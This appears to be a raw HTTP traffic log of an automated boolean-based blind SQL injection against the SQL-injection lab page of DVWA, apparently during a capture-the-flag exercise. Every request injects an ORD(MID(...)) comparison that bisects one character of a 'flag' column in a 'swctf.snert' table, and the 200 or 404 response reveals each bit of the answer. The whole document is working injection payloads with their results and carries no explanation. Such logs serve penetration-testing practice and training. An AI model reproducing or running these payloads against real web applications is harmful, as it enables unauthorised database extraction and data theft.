GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>72 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>84 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>90 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>93 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>94 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),12,1))>95 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>116 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>114 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),13,1))>115 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),14,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),14,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),14,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),14,1))>116 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),14,1))>114 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),14,1))>113 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>72 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>60 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>54 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>51 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),15,1))>49 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>47 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>87 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>107 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>117 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>109 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),16,1))>108 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),17,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),17,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),17,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),17,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),17,1))>98 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),17,1))>97 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),18,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),18,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),18,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),18,1))>108 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),18,1))>110 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),18,1))>111 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>72 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>84 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>90 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>93 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>94 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),19,1))>95 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>116 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>114 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),20,1))>115 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),21,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),21,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),21,1))>104 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),21,1))>100 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),21,1))>102 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),21,1))>101 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),22,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),22,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),22,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),22,1))>116 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),22,1))>114 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),22,1))>115 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),23,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),23,1))>112 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),23,1))>120 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),23,1))>116 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),23,1))>114 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),23,1))>115 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>96 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>1 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>24 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>36 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>42 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>45 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>46 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),24,1))>47 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>47 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>87 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>107 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>97 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>92 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>94 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),25,1))>95 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>64 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 404 Not Found  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>32 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>48 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
GET /dvwa/vulnerabilities/sqli_blind/?id=1' AND ORD(MID((SELECT IFNULL(CAST(flag AS NCHAR),0x20) FROM swctf.snert ORDER BY id LIMIT 0,1),26,1))>56 AND 'WVNa'='WVNa&Submit=Submit HTTP/1.1 
HTTP/1.1 200 OK  (text/html)
